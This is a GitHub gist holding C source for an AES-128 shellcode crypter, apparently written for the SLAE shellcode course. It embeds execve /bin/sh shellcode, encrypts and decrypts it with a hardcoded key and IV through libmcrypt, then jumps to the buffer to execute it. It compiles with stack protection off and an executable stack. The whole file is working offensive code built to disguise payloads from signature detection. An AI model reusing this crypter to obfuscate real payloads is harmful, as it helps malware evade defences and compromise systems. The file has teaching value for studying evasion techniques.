-
-
Save ReddyyZ/d44d60e94d50a49b672ac13c39862edc to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Compile using the following command: | |
$gcc aes_128_crypter.c -o aes_128_crypter -lmcrypt -fno-stack-protector -z execstack | |
Author: Nipun Jaswal (SLAE-1080) | |
*/ | |
#include <stdio.h> | |
#include <string.h> | |
#include <mcrypt.h> | |
int main() | |
{ | |
// Shellcode execve-stack | |
unsigned char * shellcode = \ | |
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f" | |
"\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89" | |
"\xe1\xb0\x0b\xcd\x80"; | |
int shell_len = strlen(shellcode); | |
// Other Variables | |
char* i_vect = "AAAABBBBCCCCDDDD"; | |
char *key = "wh4t1sloven0t1ng"; | |
unsigned char buffer[32]; | |
int count; | |
// Printing Unencrypted Shellcode | |
printf("\n[+] Shellcode Used:\n"); | |
for ( count = 0; count < shell_len; count++) | |
{ | |
printf("\\x%02x",shellcode[count]); | |
} | |
//Copy Shellcode on a 32 Byte Buffer | |
strncpy(buffer, shellcode, 32); | |
//Calling Encryption Function with Flag=0 , 32 is Length, 16 is Key Size | |
enc_dec(buffer, 32, i_vect, key,0); | |
//Printing Out Encrypted Shellcode Bytes | |
printf("\n\n[+] Encrypted Shellcode:\n"); | |
for ( count = 0; count < 32; count++) | |
{ | |
printf("\\x%02x",buffer[count]); | |
} | |
//Calling Decryption Function with Flag=1, 32 is the Length, 16 is Key Size | |
enc_dec(buffer, 32, i_vect, key,1); | |
//Printing Out Decrypted Shellcode Bytes | |
printf("\n\n[+] Decrypted Shellcode:\n"); | |
for(count = 0; count < shell_len; count++) | |
{ | |
printf("\\x%02x",buffer[count]); | |
} | |
//Calling Shellcode | |
printf("\n\nShellcode Length: %d\n", strlen(buffer)); | |
int (*ret)() = (int(*)())buffer; | |
ret(); | |
return 0; | |
} | |
// Encryption Function | |
int enc_dec(void* buffer,int buffer_len,char* i_vect, char* key, int flag) | |
{ | |
// Mcrypt Object and Selecting the Crypto | |
MCRYPT obj = mcrypt_module_open("rijndael-128", NULL, "cbc", NULL); | |
mcrypt_generic_init(obj, key, 16, i_vect); | |
if(flag==0) | |
{ | |
printf("\n\n[+]Running Encryption..."); | |
//Encrypting the Shellcode | |
mcrypt_generic(obj, buffer, buffer_len); | |
} | |
else if(flag==1) | |
{ | |
printf("\n\n[+]Running Decryption..."); | |
//Decrypting the Shellcode | |
mdecrypt_generic(obj, buffer, buffer_len); | |
} | |
mcrypt_generic_deinit (obj); | |
mcrypt_module_close(obj); | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment